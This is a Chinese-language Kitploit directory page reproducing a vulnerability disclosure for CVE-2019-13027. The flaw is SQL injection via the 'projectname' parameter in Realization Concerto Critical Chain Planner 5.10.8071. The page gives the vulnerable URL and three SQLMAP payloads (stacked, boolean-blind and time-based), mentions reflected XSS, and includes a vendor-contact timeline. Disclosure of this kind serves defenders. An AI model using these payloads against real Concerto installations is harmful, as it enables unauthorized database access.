Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-13027 — 披露 CVE-2019-13027 的详细信息 | Kitploit
工具/GitHubGitHub/ickogz/cve-2019-13027
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubickogz/cve-2019-13027

CVE-2019-13027

披露 CVE-2019-13027 的详细信息

查看仓库
117年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-13027

披露 CVE-2019-13027 的详细信息

供应商联系时间线: 2019年7月1日 -> 无回复,无邮件回复。

2019年7月4日 -> 无回复,无邮件回复。

2019年7月8日 -> 发送邮件,创建了 Github 仓库。

2019年7月11日 -> 供应商未回应。漏洞已披露。

[漏洞类型] SQL 注入 [受影响的产品代码库] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - 版本: 5.10.8071(5.x 分支的其他版本可能也受影响,但无法测试其他分支)

[受影响组件] Realization Concerto Critical Chain Planner(简称 CCPM)5.10.8071 存在一些严重的安全问题, 其中至少包括 taskupdt/taskdetails.aspx 网页中通过 "projectname" 参数触发的 SQL 注入


[攻击类型] 远程

[攻击向量] 应用程序存在大量反射型 XSS/CSRF(例如在 checklist/checklist 中),但棘手之处在于 SQL 注入。根据 SQL Server 版本和/或 IDS/IPS 的不同,可能需要进行一些篡改。

URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined

projectname(foo)必须存在且有效。对其他参数进行模糊测试(或使用真实请求)。 foo 也存在 XSS

检测到的 SQL(来自 SQLMAP 的载荷) 参数: projectname (GET)

类型: 堆叠查询
标题: Microsoft SQL Server/Sybase 堆叠查询(注释)
载荷: projectname=foo';WAITFOR DELAY '0:0:5'--

类型: 基于布尔的盲注
标题: AND 基于布尔的盲注 - WHERE 或 HAVING 子句
载荷: projectname=foo' AND 3676=3676-- 

类型: 基于时间的盲注
标题: Microsoft SQL Server/Sybase 基于时间的盲注(IF)
载荷: projectname=foo' WAITFOR DELAY '0:0:5'-- 

[产品供应商] REALIZATION - https://www.realization.com/

下载工具